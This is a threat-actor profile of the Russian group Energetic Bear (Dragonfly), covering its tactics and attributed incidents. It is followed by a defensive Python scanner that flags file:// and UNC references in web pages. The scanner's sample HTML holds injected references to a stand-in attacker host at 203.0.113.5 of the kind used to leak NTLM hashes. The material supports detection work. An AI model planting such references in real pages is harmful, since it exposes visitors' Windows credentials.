Cyber Threat Actor: Energetic Bear

Aliases: 2 aliases (Dragonfly, DragonFly)
Actor Type: Nation State
Location: Russia
Known Incidents: 6 incidents
Profile

Energetic Bear, also known as Dragonfly or DragonFly, is a threat actor that has been publicly linked to Russia and is described as a state‑sponsored group. The actor’s known aliases appear in multiple security reports and are consistently associated with operations originating from Russian infrastructure. Public attributions identify the group as working on behalf of the Russian state, particularly in campaigns that target critical infrastructure and aviation sectors. The actor’s strategic objectives, as evidenced by observed activities, include both espionage through credential harvesting and disruption via destructive wiper malware. Targeting has historically focused on energy sector organizations, with later expansions into aviation, manufacturing, and broader critical infrastructure in Europe and North America.

The group’s tactics, techniques, and procedures reveal a pattern of exploiting internet‑exposed virtual private network devices that lack multi‑factor authentication, such as FortiGate VPN appliances, to gain initial access. Once inside a network, the actor establishes persistence by altering device settings and uses lateral movement techniques, including the abuse of SMB features and file:// prefixes to collect NTLM hashes for credential theft. The actor frequently employs PowerShell‑based tools and leverages Group Policy Objects to deploy malicious payloads across compromised environments. Observed malware families include custom wipers such as LazyWiper and DynoWiper, which are designed to overwrite or destroy data, as well as scripts that harvest Windows credentials through Internet Explorer vulnerabilities. These tooling choices reflect a focus on stealthy persistence, credential access, and destructive impact when desired.

Representative operations attributed to Energetic Bear include the March 2020 compromise of two San Francisco International Airport websites, where an Internet Explorer exploit was used to steal NTLM hashes from visitors’ Windows credentials. In July 2018, the actor was reported to have infiltrated U.S. utility control rooms, gaining unauthorized access to operational technology networks without causing immediate disruption. More recently, in December 2025, the group conducted coordinated attacks against Poland’s critical infrastructure, exploiting exposed FortiGate VPN devices to reach manufacturing, heat and power, and renewable energy facilities, subsequently deploying PowerShell wipers via Group Policy to destroy data. These incidents illustrate the actor’s recurring use of VPN exploitation, credential harvesting, and wiper deployment across different geographic and sectoral targets.
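As an added, defender-side example that is not part of this profile or of any vendor's tooling: a short Python scanner that flags file:// and UNC (\\host\share) resource references in a page's HTML, the kind of injected reference described in the tactics paragraph above and in the airport-website incident. A visiting Windows browser that follows such a reference attempts an outbound SMB connection, which is what exposes the NTLM exchange, so finding the reference in your own served content is the detection point. The sample HTML, the 203.0.113.5 address, and the function names are constructed for illustration.

```python
"""Flag file:// and UNC resource references in served HTML (constructed example).

Intended to be run over a fetched copy of a site's pages so that markup
injected at the server or CDN layer is covered, not just the source tree.
"""
import re
from html.parser import HTMLParser

# Attributes that make a browser fetch a resource automatically or on click.
RESOURCE_ATTRS = {"src", "href", "action", "data", "poster", "background", "formaction"}

# file: scheme in any case (leading whitespace tolerated), or a \\host\share path.
_FILE_SCHEME = re.compile(r"^\s*file\s*:", re.IGNORECASE)
_UNC_PATH = re.compile(r"^\s*\\\\[^\\]+\\")
# CSS url(...) inside an inline style attribute pointing at the same targets.
_CSS_URL = re.compile(r"url\(\s*['\"]?\s*(file\s*:|\\\\)", re.IGNORECASE)


def is_smb_triggering(value: str) -> bool:
    """True if a URL or path value would make Windows resolve a file:// or UNC target."""
    return bool(_FILE_SCHEME.match(value) or _UNC_PATH.match(value))


class _RefCollector(HTMLParser):
    """Collects every tag attribute whose value points at a file:// or UNC resource."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and unescapes values.
        for name, value in attrs:
            if value is None:
                continue
            if name in RESOURCE_ATTRS and is_smb_triggering(value):
                self.findings.append({"tag": tag, "attr": name, "value": value})
            elif name == "style" and _CSS_URL.search(value):
                self.findings.append({"tag": tag, "attr": name, "value": value})


def find_unc_references(html: str) -> list:
    """Return a list of {tag, attr, value} findings, in document order."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: two legitimate references plus three injected ones
# (a tracking-pixel style image, a stylesheet link, and an inline CSS background).
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png">
<a href="https://example.invalid/flights">Flights</a>
<img src="file://203.0.113.5/share/pixel.png" width="1" height="1">
<link rel="stylesheet" href="\\\\203.0.113.5\\share\\site.css">
<div style="background: url(FILE://203.0.113.5/s/bg.png)"></div>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_unc_references(SAMPLE_HTML):
        print(f"{finding['tag']} {finding['attr']}={finding['value']!r}")
```

Run it against pages fetched from the outside (the bytes a visitor actually receives) rather than the files on disk, so that content altered by a compromised server, plugin, or CDN is included; a non-empty result on a page that should carry no file:// or UNC references is a strong indicator of the injection described above.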

Incidents: 6 attributed incidents (details available to members)
Sources: 2 sources (available to members)